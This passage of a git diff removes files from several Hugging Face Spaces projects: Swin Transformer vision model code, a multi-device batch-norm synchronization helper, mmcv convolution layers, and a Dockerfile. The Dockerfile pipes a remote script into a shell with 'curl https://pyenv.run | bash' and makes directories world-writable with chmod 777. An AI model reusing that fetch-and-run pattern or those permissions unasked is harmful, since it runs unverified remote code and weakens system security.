- Args: - dim (int): Number of input channels. - window_size (tuple[int]): The height and width of the window. - num_heads (int): Number of attention heads. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set - attn_drop (float, optional): Dropout ratio of attention weight. Default: 0.0 - proj_drop (float, optional): Dropout ratio of output. 
Default: 0.0 - """ - - def __init__(self, dim, window_size, num_heads, qkv_bias=True, qk_scale=None, attn_drop=0., proj_drop=0.): - - super().__init__() - self.dim = dim - self.window_size = window_size # Wh, Ww - self.num_heads = num_heads - head_dim = dim // num_heads - self.scale = qk_scale or head_dim ** -0.5 - - # define a parameter table of relative position bias - self.relative_position_bias_table = nn.Parameter( - torch.zeros((2 * window_size[0] - 1) * (2 * window_size[1] - 1), num_heads)) # 2*Wh-1 * 2*Ww-1, nH - - # get pair-wise relative position index for each token inside the window - coords_h = torch.arange(self.window_size[0]) - coords_w = torch.arange(self.window_size[1]) - coords = torch.stack(torch.meshgrid([coords_h, coords_w])) # 2, Wh, Ww - coords_flatten = torch.flatten(coords, 1) # 2, Wh*Ww - relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] # 2, Wh*Ww, Wh*Ww - relative_coords = relative_coords.permute(1, 2, 0).contiguous() # Wh*Ww, Wh*Ww, 2 - relative_coords[:, :, 0] += self.window_size[0] - 1 # shift to start from 0 - relative_coords[:, :, 1] += self.window_size[1] - 1 - relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1 - relative_position_index = relative_coords.sum(-1) # Wh*Ww, Wh*Ww - self.register_buffer("relative_position_index", relative_position_index) - - self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias) - self.attn_drop = nn.Dropout(attn_drop) - self.proj = nn.Linear(dim, dim) - self.proj_drop = nn.Dropout(proj_drop) - - trunc_normal_(self.relative_position_bias_table, std=.02) - self.softmax = nn.Softmax(dim=-1) - - def forward(self, x, mask=None): - """ - Args: - x: input features with shape of (num_windows*B, N, C) - mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None - """ - B_, N, C = x.shape - qkv = self.qkv(x).reshape(B_, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4) - q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple) - - q = q * self.scale - attn = (q @ k.transpose(-2, -1)) - - relative_position_bias = self.relative_position_bias_table[self.relative_position_index.view(-1)].view( - self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1) # Wh*Ww,Wh*Ww,nH - relative_position_bias = relative_position_bias.permute(2, 0, 1).contiguous() # nH, Wh*Ww, Wh*Ww - attn = attn + relative_position_bias.unsqueeze(0) - - if mask is not None: - nW = mask.shape[0] - attn = attn.view(B_ // nW, nW, self.num_heads, N, N) + mask.unsqueeze(1).unsqueeze(0) - attn = attn.view(-1, self.num_heads, N, N) - attn = self.softmax(attn) - else: - attn = self.softmax(attn) - - attn = self.attn_drop(attn) - - x = (attn @ v).transpose(1, 2).reshape(B_, N, C) - x = self.proj(x) - x = self.proj_drop(x) - return x - - def extra_repr(self) -> str: - return f'dim={self.dim}, window_size={self.window_size}, num_heads={self.num_heads}' - - def flops(self, N): - # calculate flops for 1 window with token length of N - flops = 0 - # qkv = self.qkv(x) - flops += N * self.dim * 3 * self.dim - # attn = (q @ k.transpose(-2, -1)) - flops += self.num_heads * N * (self.dim // self.num_heads) * N - # x = (attn @ v) - flops += self.num_heads * N * N * (self.dim // self.num_heads) - # x = self.proj(x) - flops += N * self.dim * self.dim - return flops - - -class SwinTransformerBlock(nn.Module): - r""" Swin Transformer Block. - - Args: - dim (int): Number of input channels. - input_resolution (tuple[int]): Input resulotion. - num_heads (int): Number of attention heads. 
- window_size (int): Window size. - shift_size (int): Shift size for SW-MSA. - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. - drop (float, optional): Dropout rate. Default: 0.0 - attn_drop (float, optional): Attention dropout rate. Default: 0.0 - drop_path (float, optional): Stochastic depth rate. Default: 0.0 - act_layer (nn.Module, optional): Activation layer. Default: nn.GELU - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - """ - - def __init__(self, dim, input_resolution, num_heads, window_size=7, shift_size=0, - mlp_ratio=4., qkv_bias=True, qk_scale=None, drop=0., attn_drop=0., drop_path=0., - act_layer=nn.GELU, norm_layer=nn.LayerNorm): - super().__init__() - self.dim = dim - self.input_resolution = input_resolution - self.num_heads = num_heads - self.window_size = window_size - self.shift_size = shift_size - self.mlp_ratio = mlp_ratio - if min(self.input_resolution) <= self.window_size: - # if window size is larger than input resolution, we don't partition windows - self.shift_size = 0 - self.window_size = min(self.input_resolution) - assert 0 <= self.shift_size < self.window_size, "shift_size must in 0-window_size" - - self.norm1 = norm_layer(dim) - self.attn = WindowAttention( - dim, window_size=to_2tuple(self.window_size), num_heads=num_heads, - qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop) - - self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity() - self.norm2 = norm_layer(dim) - mlp_hidden_dim = int(dim * mlp_ratio) - self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop) - - if self.shift_size > 0: - # calculate attention mask for SW-MSA - H, W = self.input_resolution - img_mask = torch.zeros((1, H, W, 1)) # 1 H W 1 - h_slices = (slice(0, -self.window_size), - slice(-self.window_size, -self.shift_size), - slice(-self.shift_size, None)) - w_slices = (slice(0, -self.window_size), - slice(-self.window_size, -self.shift_size), - slice(-self.shift_size, None)) - cnt = 0 - for h in h_slices: - for w in w_slices: - img_mask[:, h, w, :] = cnt - cnt += 1 - - mask_windows = window_partition(img_mask, self.window_size) # nW, window_size, window_size, 1 - mask_windows = mask_windows.view(-1, self.window_size * self.window_size) - attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2) - attn_mask = attn_mask.masked_fill(attn_mask != 0, float(-100.0)).masked_fill(attn_mask == 0, float(0.0)) - else: - attn_mask = None - - self.register_buffer("attn_mask", attn_mask) - - def forward(self, x): - H, W = self.input_resolution - B, L, C = x.shape - assert L == H * W, "input feature has wrong size" - - shortcut = x - x = self.norm1(x) - x = x.view(B, H, W, C) - - # cyclic shift - if self.shift_size > 0: - shifted_x = torch.roll(x, shifts=(-self.shift_size, -self.shift_size), dims=(1, 2)) - else: - shifted_x = x - - # partition windows - x_windows = window_partition(shifted_x, self.window_size) # nW*B, window_size, window_size, C - x_windows = x_windows.view(-1, self.window_size * self.window_size, C) # nW*B, window_size*window_size, C - - # W-MSA/SW-MSA - attn_windows = self.attn(x_windows, mask=self.attn_mask) # nW*B, window_size*window_size, C - - # merge windows - attn_windows = attn_windows.view(-1, self.window_size, self.window_size, C) - shifted_x = 
window_reverse(attn_windows, self.window_size, H, W) # B H' W' C - - # reverse cyclic shift - if self.shift_size > 0: - x = torch.roll(shifted_x, shifts=(self.shift_size, self.shift_size), dims=(1, 2)) - else: - x = shifted_x - x = x.view(B, H * W, C) - - # FFN - x = shortcut + self.drop_path(x) - x = x + self.drop_path(self.mlp(self.norm2(x))) - - return x - - def extra_repr(self) -> str: - return f"dim={self.dim}, input_resolution={self.input_resolution}, num_heads={self.num_heads}, " \ - f"window_size={self.window_size}, shift_size={self.shift_size}, mlp_ratio={self.mlp_ratio}" - - def flops(self): - flops = 0 - H, W = self.input_resolution - # norm1 - flops += self.dim * H * W - # W-MSA/SW-MSA - nW = H * W / self.window_size / self.window_size - flops += nW * self.attn.flops(self.window_size * self.window_size) - # mlp - flops += 2 * H * W * self.dim * self.dim * self.mlp_ratio - # norm2 - flops += self.dim * H * W - return flops - - -class PatchMerging(nn.Module): - r""" Patch Merging Layer. - - Args: - input_resolution (tuple[int]): Resolution of input feature. - dim (int): Number of input channels. - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - """ - - def __init__(self, input_resolution, dim, norm_layer=nn.LayerNorm): - super().__init__() - self.input_resolution = input_resolution - self.dim = dim - self.reduction = nn.Linear(4 * dim, 2 * dim, bias=False) - self.norm = norm_layer(4 * dim) - - def forward(self, x): - """ - x: B, H*W, C - """ - H, W = self.input_resolution - B, L, C = x.shape - assert L == H * W, "input feature has wrong size" - assert H % 2 == 0 and W % 2 == 0, f"x size ({H}*{W}) are not even." - - x = x.view(B, H, W, C) - - x0 = x[:, 0::2, 0::2, :] # B H/2 W/2 C - x1 = x[:, 1::2, 0::2, :] # B H/2 W/2 C - x2 = x[:, 0::2, 1::2, :] # B H/2 W/2 C - x3 = x[:, 1::2, 1::2, :] # B H/2 W/2 C - x = torch.cat([x0, x1, x2, x3], -1) # B H/2 W/2 4*C - x = x.view(B, -1, 4 * C) # B H/2*W/2 4*C - - x = self.norm(x) - x = self.reduction(x) - - return x - - def extra_repr(self) -> str: - return f"input_resolution={self.input_resolution}, dim={self.dim}" - - def flops(self): - H, W = self.input_resolution - flops = H * W * self.dim - flops += (H // 2) * (W // 2) * 4 * self.dim * 2 * self.dim - return flops - - -class BasicLayer(nn.Module): - """ A basic Swin Transformer layer for one stage. - - Args: - dim (int): Number of input channels. - input_resolution (tuple[int]): Input resolution. - depth (int): Number of blocks. - num_heads (int): Number of attention heads. - window_size (int): Local window size. - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. - drop (float, optional): Dropout rate. Default: 0.0 - attn_drop (float, optional): Attention dropout rate. Default: 0.0 - drop_path (float | tuple[float], optional): Stochastic depth rate. Default: 0.0 - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - downsample (nn.Module | None, optional): Downsample layer at the end of the layer. Default: None - use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False. 
- """ - - def __init__(self, dim, input_resolution, depth, num_heads, window_size, - mlp_ratio=4., qkv_bias=True, qk_scale=None, drop=0., attn_drop=0., - drop_path=0., norm_layer=nn.LayerNorm, downsample=None, use_checkpoint=False): - - super().__init__() - self.dim = dim - self.input_resolution = input_resolution - self.depth = depth - self.use_checkpoint = use_checkpoint - - # build blocks - self.blocks = nn.ModuleList([ - SwinTransformerBlock(dim=dim, input_resolution=input_resolution, - num_heads=num_heads, window_size=window_size, - shift_size=0 if (i % 2 == 0) else window_size // 2, - mlp_ratio=mlp_ratio, - qkv_bias=qkv_bias, qk_scale=qk_scale, - drop=drop, attn_drop=attn_drop, - drop_path=drop_path[i] if isinstance(drop_path, list) else drop_path, - norm_layer=norm_layer) - for i in range(depth)]) - - # patch merging layer - if downsample is not None: - self.downsample = downsample(input_resolution, dim=dim, norm_layer=norm_layer) - else: - self.downsample = None - - def forward(self, x): - for blk in self.blocks: - if self.use_checkpoint: - x = checkpoint.checkpoint(blk, x) - else: - x = blk(x) - if self.downsample is not None: - x = self.downsample(x) - return x - - def extra_repr(self) -> str: - return f"dim={self.dim}, input_resolution={self.input_resolution}, depth={self.depth}" - - def flops(self): - flops = 0 - for blk in self.blocks: - flops += blk.flops() - if self.downsample is not None: - flops += self.downsample.flops() - return flops - - -class PatchEmbed(nn.Module): - r""" Image to Patch Embedding - - Args: - img_size (int): Image size. Default: 224. - patch_size (int): Patch token size. Default: 4. - in_chans (int): Number of input image channels. Default: 3. - embed_dim (int): Number of linear projection output channels. Default: 96. - norm_layer (nn.Module, optional): Normalization layer. Default: None - """ - - def __init__(self, img_size=224, patch_size=4, in_chans=3, embed_dim=96, norm_layer=None): - super().__init__() - img_size = to_2tuple(img_size) - patch_size = to_2tuple(patch_size) - patches_resolution = [img_size[0] // patch_size[0], img_size[1] // patch_size[1]] - self.img_size = img_size - self.patch_size = patch_size - self.patches_resolution = patches_resolution - self.num_patches = patches_resolution[0] * patches_resolution[1] - - self.in_chans = in_chans - self.embed_dim = embed_dim - - self.proj = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=patch_size) - if norm_layer is not None: - self.norm = norm_layer(embed_dim) - else: - self.norm = None - - def forward(self, x): - B, C, H, W = x.shape - # FIXME look at relaxing size constraints - assert H == self.img_size[0] and W == self.img_size[1], \ - f"Input image size ({H}*{W}) doesn't match model ({self.img_size[0]}*{self.img_size[1]})." - x = self.proj(x).flatten(2).transpose(1, 2) # B Ph*Pw C - if self.norm is not None: - x = self.norm(x) - return x - - def flops(self): - Ho, Wo = self.patches_resolution - flops = Ho * Wo * self.embed_dim * self.in_chans * (self.patch_size[0] * self.patch_size[1]) - if self.norm is not None: - flops += Ho * Wo * self.embed_dim - return flops - - -class SwinTransformer(nn.Module): - r""" Swin Transformer - A PyTorch impl of : `Swin Transformer: Hierarchical Vision Transformer using Shifted Windows` - - https://arxiv.org/pdf/2103.14030 - - Args: - img_size (int | tuple(int)): Input image size. Default 224 - patch_size (int | tuple(int)): Patch size. Default: 4 - in_chans (int): Number of input image channels. 
Default: 3 - num_classes (int): Number of classes for classification head. Default: 1000 - embed_dim (int): Patch embedding dimension. Default: 96 - depths (tuple(int)): Depth of each Swin Transformer layer. - num_heads (tuple(int)): Number of attention heads in different layers. - window_size (int): Window size. Default: 7 - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4 - qkv_bias (bool): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float): Override default qk scale of head_dim ** -0.5 if set. Default: None - drop_rate (float): Dropout rate. Default: 0 - attn_drop_rate (float): Attention dropout rate. Default: 0 - drop_path_rate (float): Stochastic depth rate. Default: 0.1 - norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm. - ape (bool): If True, add absolute position embedding to the patch embedding. Default: False - patch_norm (bool): If True, add normalization after patch embedding. Default: True - use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False - """ - - def __init__(self, img_size=224, patch_size=4, in_chans=3, num_classes=1000, - embed_dim=96, depths=[2, 2, 6, 2], num_heads=[3, 6, 12, 24], - window_size=7, mlp_ratio=4., qkv_bias=True, qk_scale=None, - drop_rate=0., attn_drop_rate=0., drop_path_rate=0.1, - norm_layer=nn.LayerNorm, ape=False, patch_norm=True, - use_checkpoint=False, **kwargs): - super().__init__() - - self.num_classes = num_classes - self.num_layers = len(depths) - self.embed_dim = embed_dim - self.ape = ape - self.patch_norm = patch_norm - self.num_features = int(embed_dim * 2 ** (self.num_layers - 1)) - self.mlp_ratio = mlp_ratio - - # split image into non-overlapping patches - self.patch_embed = PatchEmbed( - img_size=img_size, patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim, - norm_layer=norm_layer if self.patch_norm else None) - num_patches = self.patch_embed.num_patches - patches_resolution = self.patch_embed.patches_resolution - self.patches_resolution = patches_resolution - - # absolute position embedding - if self.ape: - self.absolute_pos_embed = nn.Parameter(torch.zeros(1, num_patches, embed_dim)) - trunc_normal_(self.absolute_pos_embed, std=.02) - - self.pos_drop = nn.Dropout(p=drop_rate) - - # stochastic depth - dpr = [x.item() for x in torch.linspace(0, drop_path_rate, sum(depths))] # stochastic depth decay rule - - # build layers - self.layers = nn.ModuleList() - for i_layer in range(self.num_layers): - layer = BasicLayer(dim=int(embed_dim * 2 ** i_layer), - input_resolution=(patches_resolution[0] // (2 ** i_layer), - patches_resolution[1] // (2 ** i_layer)), - depth=depths[i_layer], - num_heads=num_heads[i_layer], - window_size=window_size, - mlp_ratio=self.mlp_ratio, - qkv_bias=qkv_bias, qk_scale=qk_scale, - drop=drop_rate, attn_drop=attn_drop_rate, - drop_path=dpr[sum(depths[:i_layer]):sum(depths[:i_layer + 1])], - norm_layer=norm_layer, - downsample=PatchMerging if (i_layer < self.num_layers - 1) else None, - use_checkpoint=use_checkpoint) - self.layers.append(layer) - - self.norm = norm_layer(self.num_features) - self.avgpool = nn.AdaptiveAvgPool1d(1) - # self.head = nn.Linear(self.num_features, num_classes) if num_classes > 0 else nn.Identity() - - self.apply(self._init_weights) - - def _init_weights(self, m): - if isinstance(m, nn.Linear): - trunc_normal_(m.weight, std=.02) - if isinstance(m, nn.Linear) and m.bias is not None: - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.LayerNorm): - nn.init.constant_(m.bias, 0) 
- nn.init.constant_(m.weight, 1.0) - - @torch.jit.ignore - def no_weight_decay(self): - return {'absolute_pos_embed'} - - @torch.jit.ignore - def no_weight_decay_keywords(self): - return {'relative_position_bias_table'} - - def forward(self, x, idx_to_group_img=None, image_atts=None, **kwargs): - x = self.patch_embed(x) - if self.ape: - x = x + self.absolute_pos_embed - x = self.pos_drop(x) - - for layer in self.layers: - x = layer(x) - - x = self.norm(x) # B L C - - x_cls = self.avgpool(x.transpose(1, 2)) # B C 1 - - if idx_to_group_img is None: - return torch.cat([x_cls.transpose(1, 2), x], dim=1) - else: - x_bs = torch.gather(x, dim=0, index=idx_to_group_img.view(-1, 1, 1).expand(-1, x.shape[1], x.shape[2])) - weights = image_atts[:, 1:].unsqueeze(2) # B L 1 - x_bs_cls = torch.sum((weights * x_bs).transpose(1, 2), dim=-1, keepdim=True) # B C 1 - x_bs_cls = x_bs_cls / torch.sum(weights.transpose(1, 2), dim=-1, keepdim=True) # avgpool - - return torch.cat([x_bs_cls.transpose(1, 2), x_bs], dim=1), \ - torch.cat([x_cls.transpose(1, 2), x], dim=1) - - def flops(self): - flops = 0 - flops += self.patch_embed.flops() - for i, layer in enumerate(self.layers): - flops += layer.flops() - flops += self.num_features * self.patches_resolution[0] * self.patches_resolution[1] // (2 ** self.num_layers) - flops += self.num_features * self.num_classes - return flops - - -def interpolate_relative_pos_embed(rel_pos_bias, dst_num_pos, param_name=''): - # from: https://github.com/microsoft/unilm/blob/8a0a1c1f4e7326938ea7580a00d56d7f17d65612/beit/run_class_finetuning.py#L348 - - # rel_pos_bias: relative_position_bias_table - src_num_pos, num_attn_heads = rel_pos_bias.size() - - num_extra_tokens = 0 - src_size = int((src_num_pos - num_extra_tokens) ** 0.5) - dst_size = int((dst_num_pos - num_extra_tokens) ** 0.5) - if src_size != dst_size: - print("Position interpolate %s from %dx%d to %dx%d" % (param_name, src_size, src_size, dst_size, dst_size)) - - # extra_tokens = rel_pos_bias[-num_extra_tokens:, :] - # rel_pos_bias = rel_pos_bias[:-num_extra_tokens, :] - - def geometric_progression(a, r, n): - return a * (1.0 - r ** n) / (1.0 - r) - - left, right = 1.01, 1.5 - while right - left > 1e-6: - q = (left + right) / 2.0 - gp = geometric_progression(1, q, src_size // 2) - if gp > dst_size // 2: - right = q - else: - left = q - - # if q > 1.090307: - # q = 1.090307 - - dis = [] - cur = 1 - for i in range(src_size // 2): - dis.append(cur) - cur += q ** (i + 1) - - r_ids = [-_ for _ in reversed(dis)] - - x = r_ids + [0] + dis - y = r_ids + [0] + dis - - t = dst_size // 2.0 - dx = np.arange(-t, t + 0.1, 1.0) - dy = np.arange(-t, t + 0.1, 1.0) - - # print("Original positions = %s" % str(x)) - # print("Target positions = %s" % str(dx)) - - all_rel_pos_bias = [] - - for i in range(num_attn_heads): - z = rel_pos_bias[:, i].view(src_size, src_size).float().numpy() - f = interpolate.interp2d(x, y, z, kind='cubic') - all_rel_pos_bias.append( - torch.Tensor(f(dx, dy)).contiguous().view(-1, 1).to(rel_pos_bias.device)) - - rel_pos_bias = torch.cat(all_rel_pos_bias, dim=-1) - - return rel_pos_bias \ No newline at end of file diff --git a/spaces/OpenGVLab/InternGPT/third-party/lama/bin/models/ade20k/segm_lib/nn/parallel/__init__.py b/spaces/OpenGVLab/InternGPT/third-party/lama/bin/models/ade20k/segm_lib/nn/parallel/__init__.py deleted file mode 100644 index 9b52f49cc0755562218a460483cbf02514ddd773..0000000000000000000000000000000000000000 --- 
a/spaces/OpenGVLab/InternGPT/third-party/lama/bin/models/ade20k/segm_lib/nn/parallel/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from .data_parallel import UserScatteredDataParallel, user_scattered_collate, async_copy_to diff --git a/spaces/OpenGVLab/InternGPT/third-party/lama/models/ade20k/segm_lib/nn/modules/comm.py b/spaces/OpenGVLab/InternGPT/third-party/lama/models/ade20k/segm_lib/nn/modules/comm.py deleted file mode 100644 index b64bf6ba3b3e7abbab375c6dd4a87d8239e62138..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/third-party/lama/models/ade20k/segm_lib/nn/modules/comm.py +++ /dev/null @@ -1,131 +0,0 @@ -# -*- coding: utf-8 -*- -# File : comm.py -# Author : Jiayuan Mao -# Email : maojiayuan@gmail.com -# Date : 27/01/2018 -# -# This file is part of Synchronized-BatchNorm-PyTorch. -# https://github.com/vacancy/Synchronized-BatchNorm-PyTorch -# Distributed under MIT License. - -import queue -import collections -import threading - -__all__ = ['FutureResult', 'SlavePipe', 'SyncMaster'] - - -class FutureResult(object): - """A thread-safe future implementation. Used only as one-to-one pipe.""" - - def __init__(self): - self._result = None - self._lock = threading.Lock() - self._cond = threading.Condition(self._lock) - - def put(self, result): - with self._lock: - assert self._result is None, 'Previous result has\'t been fetched.' - self._result = result - self._cond.notify() - - def get(self): - with self._lock: - if self._result is None: - self._cond.wait() - - res = self._result - self._result = None - return res - - -_MasterRegistry = collections.namedtuple('MasterRegistry', ['result']) -_SlavePipeBase = collections.namedtuple('_SlavePipeBase', ['identifier', 'queue', 'result']) - - -class SlavePipe(_SlavePipeBase): - """Pipe for master-slave communication.""" - - def run_slave(self, msg): - self.queue.put((self.identifier, msg)) - ret = self.result.get() - self.queue.put(True) - return ret - - -class SyncMaster(object): - """An abstract `SyncMaster` object. - - - During the replication, as the data parallel will trigger an callback of each module, all slave devices should - call `register(id)` and obtain an `SlavePipe` to communicate with the master. - - During the forward pass, master device invokes `run_master`, all messages from slave devices will be collected, - and passed to a registered callback. - - After receiving the messages, the master device should gather the information and determine to message passed - back to each slave devices. - """ - - def __init__(self, master_callback): - """ - - Args: - master_callback: a callback to be invoked after having collected messages from slave devices. - """ - self._master_callback = master_callback - self._queue = queue.Queue() - self._registry = collections.OrderedDict() - self._activated = False - - def register_slave(self, identifier): - """ - Register an slave device. - - Args: - identifier: an identifier, usually is the device id. - - Returns: a `SlavePipe` object which can be used to communicate with the master device. - - """ - if self._activated: - assert self._queue.empty(), 'Queue is not clean before next initialization.' - self._activated = False - self._registry.clear() - future = FutureResult() - self._registry[identifier] = _MasterRegistry(future) - return SlavePipe(identifier, self._queue, future) - - def run_master(self, master_msg): - """ - Main entry for the master device in each forward pass. 
- The messages were first collected from each devices (including the master device), and then - an callback will be invoked to compute the message to be sent back to each devices - (including the master device). - - Args: - master_msg: the message that the master want to send to itself. This will be placed as the first - message when calling `master_callback`. For detailed usage, see `_SynchronizedBatchNorm` for an example. - - Returns: the message to be sent back to the master device. - - """ - self._activated = True - - intermediates = [(0, master_msg)] - for i in range(self.nr_slaves): - intermediates.append(self._queue.get()) - - results = self._master_callback(intermediates) - assert results[0][0] == 0, 'The first result should belongs to the master.' - - for i, res in results: - if i == 0: - continue - self._registry[i].result.put(res) - - for i in range(self.nr_slaves): - assert self._queue.get() is True - - return results[0][1] - - @property - def nr_slaves(self): - return len(self._registry) diff --git a/spaces/PAIR/PAIR-Diffusion/Dockerfile b/spaces/PAIR/PAIR-Diffusion/Dockerfile deleted file mode 100644 index 64a6eca483c57db8d8321199018d83eaad58dac3..0000000000000000000000000000000000000000 --- a/spaces/PAIR/PAIR-Diffusion/Dockerfile +++ /dev/null @@ -1,68 +0,0 @@ -FROM nvidia/cuda:11.3.1-cudnn8-devel-ubuntu18.04 -CMD nvidia-smi - -ENV DEBIAN_FRONTEND noninteractive -RUN apt-get update && apt-get install -y \ - git \ - make build-essential libssl-dev zlib1g-dev \ - libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm \ - libncursesw5-dev xz-utils tk-dev libxml2-dev libxmlsec1-dev libffi-dev liblzma-dev \ - ffmpeg libsm6 libxext6 cmake libgl1-mesa-glx \ - && rm -rf /var/lib/apt/lists/* - -RUN useradd -ms /bin/bash user -USER user - -ENV HOME=/home/user \ - PATH=/home/user/.local/bin:$PATH - -RUN curl https://pyenv.run | bash -ENV PATH=$HOME/.pyenv/shims:$HOME/.pyenv/bin:$PATH -RUN pyenv install 3.8.15 && \ - pyenv global 3.8.15 && \ - pyenv rehash && \ - pip install --no-cache-dir --upgrade pip setuptools wheel - -ENV WORKDIR=/code -WORKDIR $WORKDIR -RUN chown -R user:user $WORKDIR -RUN chmod -R 777 $WORKDIR - -COPY requirements.txt $WORKDIR/requirements.txt -RUN pip install --no-cache-dir --upgrade -r $WORKDIR/requirements.txt -RUN pip install ninja - -COPY . . - -ARG TORCH_CUDA_ARCH_LIST=7.5+PTX - -USER root -RUN chown -R user:user $HOME -RUN chmod -R 777 $HOME -RUN chown -R user:user $WORKDIR -RUN chmod -R 777 $WORKDIR - -USER user -RUN ln -s $WORKDIR/annotator/OneFormer/oneformer/modeling/pixel_decoder/ops $WORKDIR/ && ls -RUN cd ops/ && FORCE_CUDA=1 python setup.py build --build-base=$WORKDIR/ install --user && cd .. -RUN sh deform_setup.sh - -USER user -RUN sh deform_setup.sh - -USER user - -ENV PYTHONPATH=${HOME}/app \ - PYTHONUNBUFFERED=1 \ - GRADIO_ALLOW_FLAGGING=never \ - GRADIO_NUM_PORTS=1 \ - GRADIO_SERVER_NAME=0.0.0.0 \ - GRADIO_THEME=huggingface \ - SYSTEM=spaces - -RUN --mount=type=secret,id=ACCESS_TOKEN,mode=0444,required=true - - -EXPOSE 7860 - -ENTRYPOINT ["python", "app.py"] \ No newline at end of file diff --git a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/cnn/bricks/conv_ws.py b/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/cnn/bricks/conv_ws.py deleted file mode 100644 index a3941e27874993418b3b5708d5a7485f175ff9c8..0000000000000000000000000000000000000000 --- a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/cnn/bricks/conv_ws.py +++ /dev/null @@ -1,148 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
-import torch -import torch.nn as nn -import torch.nn.functional as F - -from .registry import CONV_LAYERS - - -def conv_ws_2d(input, - weight, - bias=None, - stride=1, - padding=0, - dilation=1, - groups=1, - eps=1e-5): - c_in = weight.size(0) - weight_flat = weight.view(c_in, -1) - mean = weight_flat.mean(dim=1, keepdim=True).view(c_in, 1, 1, 1) - std = weight_flat.std(dim=1, keepdim=True).view(c_in, 1, 1, 1) - weight = (weight - mean) / (std + eps) - return F.conv2d(input, weight, bias, stride, padding, dilation, groups) - - -@CONV_LAYERS.register_module('ConvWS') -class ConvWS2d(nn.Conv2d): - - def __init__(self, - in_channels, - out_channels, - kernel_size, - stride=1, - padding=0, - dilation=1, - groups=1, - bias=True, - eps=1e-5): - super(ConvWS2d, self).__init__( - in_channels, - out_channels, - kernel_size, - stride=stride, - padding=padding, - dilation=dilation, - groups=groups, - bias=bias) - self.eps = eps - - def forward(self, x): - return conv_ws_2d(x, self.weight, self.bias, self.stride, self.padding, - self.dilation, self.groups, self.eps) - - -@CONV_LAYERS.register_module(name='ConvAWS') -class ConvAWS2d(nn.Conv2d): - """AWS (Adaptive Weight Standardization) - - This is a variant of Weight Standardization - (https://arxiv.org/pdf/1903.10520.pdf) - It is used in DetectoRS to avoid NaN - (https://arxiv.org/pdf/2006.02334.pdf) - - Args: - in_channels (int): Number of channels in the input image - out_channels (int): Number of channels produced by the convolution - kernel_size (int or tuple): Size of the conv kernel - stride (int or tuple, optional): Stride of the convolution. Default: 1 - padding (int or tuple, optional): Zero-padding added to both sides of - the input. Default: 0 - dilation (int or tuple, optional): Spacing between kernel elements. - Default: 1 - groups (int, optional): Number of blocked connections from input - channels to output channels. Default: 1 - bias (bool, optional): If set True, adds a learnable bias to the - output. Default: True - """ - - def __init__(self, - in_channels, - out_channels, - kernel_size, - stride=1, - padding=0, - dilation=1, - groups=1, - bias=True): - super().__init__( - in_channels, - out_channels, - kernel_size, - stride=stride, - padding=padding, - dilation=dilation, - groups=groups, - bias=bias) - self.register_buffer('weight_gamma', - torch.ones(self.out_channels, 1, 1, 1)) - self.register_buffer('weight_beta', - torch.zeros(self.out_channels, 1, 1, 1)) - - def _get_weight(self, weight): - weight_flat = weight.view(weight.size(0), -1) - mean = weight_flat.mean(dim=1).view(-1, 1, 1, 1) - std = torch.sqrt(weight_flat.var(dim=1) + 1e-5).view(-1, 1, 1, 1) - weight = (weight - mean) / std - weight = self.weight_gamma * weight + self.weight_beta - return weight - - def forward(self, x): - weight = self._get_weight(self.weight) - return F.conv2d(x, weight, self.bias, self.stride, self.padding, - self.dilation, self.groups) - - def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict, - missing_keys, unexpected_keys, error_msgs): - """Override default load function. - - AWS overrides the function _load_from_state_dict to recover - weight_gamma and weight_beta if they are missing. If weight_gamma and - weight_beta are found in the checkpoint, this function will return - after super()._load_from_state_dict. Otherwise, it will compute the - mean and std of the pretrained weights and store them in weight_beta - and weight_gamma. 
